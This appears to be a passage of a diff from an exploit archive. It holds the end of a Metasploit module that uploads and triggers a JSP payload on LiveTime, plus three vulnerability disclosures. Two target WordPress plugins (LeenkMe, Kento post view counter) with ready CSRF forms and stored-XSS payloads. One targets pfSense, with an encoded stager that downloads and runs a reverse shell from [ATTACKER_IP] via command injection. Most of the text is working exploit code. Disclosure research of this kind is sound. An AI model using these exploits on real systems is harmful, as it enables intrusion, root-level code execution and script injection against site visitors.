# pick_target returns the traversal_path and sets @my_target
traversal_path = pick_target
if @my_target.nil?
fail_with(Failure::NoTarget, "#{peer} - Unable to select a target, we must bail.")
else
print_status("#{peer} - Selected target #{@my_target.name} with traversal path #{traversal_path}")
end
# When using auto targeting, MSF selects the Windows meterpreter as the default payload.
# Fail if this is the case and ask the user to select an appropriate payload.
if @my_target['Platform'] == 'linux' && payload_instance.name =~ /Windows/
fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.")
end
# 5: generate the JSP with the payload
jsp = create_jsp
print_status("#{peer} - Uploading payload...")
jsp_name = upload_jsp(traversal_path, jsp)
if traversal_path.include? '/srv/tomcat6/webapps/'
register_files_for_cleanup('/srv/tomcat6/webapps/LiveTime/' + jsp_name)
else
register_files_for_cleanup('../webapps/LiveTime/' + jsp_name)
end
# 6: pwn it!
print_status("#{peer} - Requesting #{jsp_name}")
send_request_raw({'uri' => normalize_uri('LiveTime', jsp_name)})
handler
end
end

117
platforms/php/webapps/39704.txt Executable file
View file

@ -0,0 +1,117 @@
I would like to disclose CSRF and stored XSS vulnerability in Wordpress
plugin LeenkMe version 2.5.0.
The plugin can be found at https://wordpress.org/plugins/leenkme/
In the page wp-content/plugins/leenkme/facebook.php
XSS vulnerable Fields are :
- facebook_message
- facebook_linkname
- facebook_caption
- facebook_description
- default_image
- _wp_http_referer
This CSRF is tested on latest wordpress installation 4.4.2 using firefox
browser.
The Code for CSRF.html is
<html>
<body onload="document.forms['xss'].submit()" >
<form name="xss" action="
http://127.0.0.1/wp/wp-admin/admin.php?page=leenkme_facebook" method="POST">
<input type="hidden" name="facebook_profile" value="on" />
<input type="hidden" name="fb_publish_wpnonce" value="" />
<input type="hidden" name="_wp_http_referer" value="XSS" />
<input type="hidden" name="facebook_message" value="XSS" />
<input type="hidden" name="facebook_linkname" value="XSS" />
<input type="hidden" name="facebook_caption" value="XSS" />
<input type="hidden" name="facebook_description" value="
&lt;/textarea&gt;<script>prompt();</script>" />
<input type="hidden" name="default_image" value="XSS" />
<input type="hidden" name="message_preference" value="author" />
<input type="hidden" name="clude" value="in" />
<input type="hidden" name="publish_cats&#91;&#93;" value="0" />
<input type="hidden" name="update_facebook_settings"
value="Save&#32;Settings" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
The vulnerable page is
wp-content/plugins/leenkme/facebook.php
The vulnerable code producing XSS is
if ( !empty( $_REQUEST['facebook_message'] ) )
$user_settings['facebook_message'] = $_REQUEST['facebook_message'];
else
$user_settings['facebook_message'] = '';
if ( !empty( $_REQUEST['facebook_linkname'] ) )
$user_settings['facebook_linkname'] = $_REQUEST['facebook_linkname'];
else
$user_settings['facebook_linkname'] = '';
if ( !empty( $_REQUEST['facebook_caption'] ) )
$user_settings['facebook_caption'] = $_REQUEST['facebook_caption'];
else
$user_settings['facebook_caption'] = '';
if ( !empty( $_REQUEST['facebook_description'] ) )
$user_settings['facebook_description'] = $_REQUEST['facebook_description'];
-------------------------
-------------------------
-------------------------
snip
------------------------
-------------------------
--------------------------
<td><textarea name="facebook_message" style="width: 500px;"
maxlength="400"><?php
echo $user_settings['facebook_message']; ?>&lt;/textarea&gt;</td>
</tr>
<tr>
<td><?php _e( 'Default Link Name:', 'leenkme'
); ?></td>
<td><input name="facebook_linkname"
type="text" style="width: 500px;" value="<?php echo
$user_settings['facebook_linkname']; ?>" maxlength="100"/></td>
</tr>
<tr>
<td><?php _e( 'Default Caption:', 'leenkme' );
?></td>
<td><input name="facebook_caption"
type="text" style="width: 500px;" value="<?php echo
$user_settings['facebook_caption']; ?>" maxlength="100"/></td>
</tr>
<tr>
<td style='vertical-align: top; padding-top:
5px;'><?php _e( 'Default Description:', 'leenkme' ); ?></td>
<td><textarea name="facebook_description"
style="width: 500px;" maxlength="300"><?php echo
$user_settings['facebook_description']; ?>&lt;/textarea&gt;</td>
The code used to protect against CSRF that is the anti csrf token used is
<?php wp_nonce_field( 'fb_publish', 'fb_publish_wpnonce' ); ?>
But this code is not protecting against the CSRF, the form get submitted
successfully with out any error even though the fb_publish_wpnonce is kept
empty resulting in CSRF vulnerability.
# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/in/cor3sm4sh3r
# Twitter: https://twitter.com/cor3sm4sh3r

133
platforms/php/webapps/39705.txt Executable file
View file

@ -0,0 +1,133 @@
I would like to disclose CSRF and stored XSS vulnerability in Kento post view counter plugin version 2.8 .
The vulnerable Fields for XSS are
kento_pvc_numbers_lang
kento_pvc_today_text
kento_pvc_total_text
The combination of CSRF and XSS in this plugin can lead to huge damage of the website, as the two fields kento_pvc_today_text and kento_pvc_total_text are reflected on all authenticated users as well as non-authenticated user ,all the post have a footer which shows this two parameter reflected in them ,so if an attacker successfully attacks a website almost all the pages on that website will execute the malicious javascript payload on all the clients browsers visiting that website.every user visiting the website will be affected.
The plugin can be found at https://wordpress.org/plugins/kento-post-view-counter/
This CSRF is tested on latest wordpress installation 4.4.2 using firefox browser. and chrome.
The Code for CSRF.html is
<html>
<body>
<form action="http://targetsite/wp-admin/admin.php?page=kentopvc_settings" method="POST">
<input type="hidden" name="kentopvc_hidden" value="Y" />
<input type="hidden" name="option_page" value="kento_pvc_plugin_options" />
<input type="hidden" name="action" value="update" />
<input type="hidden" name="_wpnonce" value="" />
<input type="hidden" name="_wp_http_referer" value="" />
<input type="hidden" name="kento_pvc_posttype[post]" value="1" />
<input type="hidden" name="kento_pvc_posttype[page]" value="1" />
<input type="hidden" name="kento_pvc_posttype[attachment]" value="1" />
<input type="hidden" name="kento_pvc_posttype[revision]" value="1" />
<input type="hidden" name="kento_pvc_posttype[nav_menu_item]" value="1" />
<input type="hidden" name="kento_pvc_numbers_lang" value="" />
<input type="hidden" name="kento_pvc_today_text" value=""<script>alert(1);</script><img src="b" />
<input type="hidden" name="kento_pvc_total_text" value="" />
<input type="hidden" name="Submit" value="Save Changes" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
The Vulnerable page is
wp-content\plugins\kento-post-view-counter\kento-pvc-admin.php
The code Reponsible for XSS :
if($_POST['kentopvc_hidden'] == 'Y') {
//Form data sent
if(empty($_POST['kento_pvc_hide']))
{
$kento_pvc_hide ="";
}
else
{
$kento_pvc_hide = $_POST['kento_pvc_hide'];
}
update_option('kento_pvc_hide', $kento_pvc_hide);
if(empty($_POST['kento_pvc_posttype']))
{
$kento_pvc_posttype ="";
}
else
{
$kento_pvc_posttype = $_POST['kento_pvc_posttype'];
}
update_option('kento_pvc_posttype', $kento_pvc_posttype);
if(empty($_POST['kento_pvc_uniq']))
{
$kento_pvc_uniq ="";
}
else
{
$kento_pvc_uniq = $_POST['kento_pvc_uniq'];
}
update_option('kento_pvc_uniq', $kento_pvc_uniq);
$kento_pvc_numbers_lang = $_POST['kento_pvc_numbers_lang'];
update_option('kento_pvc_numbers_lang', $kento_pvc_numbers_lang);
$kento_pvc_today_text = $_POST['kento_pvc_today_text'];
update_option('kento_pvc_today_text', $kento_pvc_today_text);
$kento_pvc_total_text = $_POST['kento_pvc_total_text'];
update_option('kento_pvc_total_text', $kento_pvc_total_text);
--------------------------snip-----------------------
------------------snip ------------------------------
<input type="text" size="20" name="kento_pvc_numbers_lang" id="kento-pvc-numbers-lang" value ="<?php if (isset($kento_pvc_numbers_lang)) echo $kento_pvc_numbers_lang; ?>" placeholder="0,1,2,3,4,5,6,7,8,9" /><br />**Write numbers in your language as following 0,1,2,3,4,5,6,7,8,9<br />
Left blank if you are in English.
<tr valign="top">
<th scope="row">Text For Today View</th>
<td style="vertical-align:middle;">
<input type="text" size="20" name="kento_pvc_today_text" id="kento-pvc-today-text" value ="<?php if (isset($kento_pvc_today_text)) echo $kento_pvc_today_text; ?>" placeholder="Views Today " />
</td>
</tr>
<tr valign="top">
<th scope="row">Text For Total View</th>
<td style="vertical-align:middle;">
<input type="text" size="20" name="kento_pvc_total_text" id="kento-pvc-total-text" value ="<?php if (isset($kento_pvc_total_text)) echo $kento_pvc_total_text; ?>" placeholder="Total Views " />
</td>
</tr>
No anti-CSRF token used on this form :
All though the WordPress sends the _wpnonce value but it does not protect this form against CSRF.
# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/in/cor3sm4sh3r
# Twitter: https://twitter.com/cor3sm4sh3r

145
platforms/php/webapps/39709.txt Executable file
View file

@ -0,0 +1,145 @@
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
PfSense Community Edition Multiple Vulnerabilities
Affected versions: PfSense Community Edition <= 2.2.6
PDF:
http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf
+-----------+
|Description|
+-----------+
The pfSense community edition firewall is vulnerable to multiple
vulnerabilities, including remote code execution via command injection
as an authenticated non-administrative user, stored and reflected
cross-site scripting.
+------------+
|Exploitation|
+------------+
==Command Injection==
The status_rrd_graph_img.php page is vulnerable to command injection via
the graph GET parameter. A non-administrative authenticated attacker
having access privileges to the graph status functionality can inject
arbitrary operating system commands and execute them in the context of
the root user. Although input validation is performed on the graph
parameter through a regular expression filter, the pipe character is not
removed. Octal characters sequences can be used to encode a payload,
bypass the filter for illegal characters, and create a PHP file to
download and execute a malicious file (i.e. reverse shell) from a remote
attacker controlled host.
[Octal-encoded PHP Stager]
stager = (
'echo \'<?php $shell =
file_get_contents("http://[ATTACKER_IP]/shell.elf");' +
'file_put_contents("myshell.elf", $shell);' +
'system("chmod 755 myshell.elf && ./myshell.elf"); ?> \' > shellexec'
)
encoded_stager = ''
for c in stager:
encoded_stager += "\\\\%03d" %(int(oct(ord(c))))
print encoded_stager
[CSRF POC]
<html>
<head>
<script>
function sploit() {
var query = "database=-throughput.rrd&graph=file|printf
[ENCODED_STAGER]|sh|echo ";
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://<target>/status_rrd_graph_img.php?" +
query, true);
xhr.withCredentials = true;
xhr.send();
setTimeout(shellexec, 2000);
}
function shellexec() {
document.csrf_exploit_exec.submit();
}
</script>
</head>
<body onload="sploit();">
<form name="csrf_exploit_exec"
action="https://<target>/status_rrd_graph_img.php">
<input type="hidden" name="database" value="-throughput.rrd" />
<input type="hidden" name="graph" value="file|php shellexec|echo " />
</form>
</body>
</html>
==Cross-site Scripting==
Multiple instances of stored and reflected cross-scripting
vulnerabilities exist in the web interface of the application. An
authenticated attacker with limited privileges can run arbitrary
JavaScript code in the context of admin users session and extend their
access to administrative areas of the application (i.e. command prompt
functionality).
Param => descr
Method => POST
URL => /system_gateways_edit.php
Payload => <script>alert(1)</script>
Render => /system_gateways_groups_edit.php
Type => Stored
Param => container
Method => POST
URL => /firewall_shaper_layer7.php
Payload => "><script>alert(1)</script>
Render => /firewall_shaper_layer7.php
Type => Reflected
Param => newname
Method => POST
URL => /firewall_shaper_vinterface.php
Payload => "><script>alert(1)</script>
Render => /firewall_shaper_vinterface.php
Type => Reflected
+----------+
| Solution |
+----------+
Upgrade to pfSense 2.3. This may be performed in the web interface or
from the console.
+------------+
| Timeline |
+------------+
10/02/2016 Initial disclosure to pfSense.
11/02/2016 Vendor confirms receipt of advisory and provides fixes.
16/02/1016 Sent follow up email about public release.
16/02/2016 Vendor requests advisory disclosure after release of new
software build.
12/04/2016 Release of patched software build and vendor disclosure of
security advisories.
15/04/2016 Public disclosure of security advisory.
+------------+
| Additional |
+------------+
Further information is available in the accompanying PDF.
http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf
+------------+
| References |
+------------+
https://www.pfsense.org/security/advisories/pfSense-SA-16_01.webgui.asc
https://www.pfsense.org/security/advisories/pfSense-SA-16_02.webgui.asc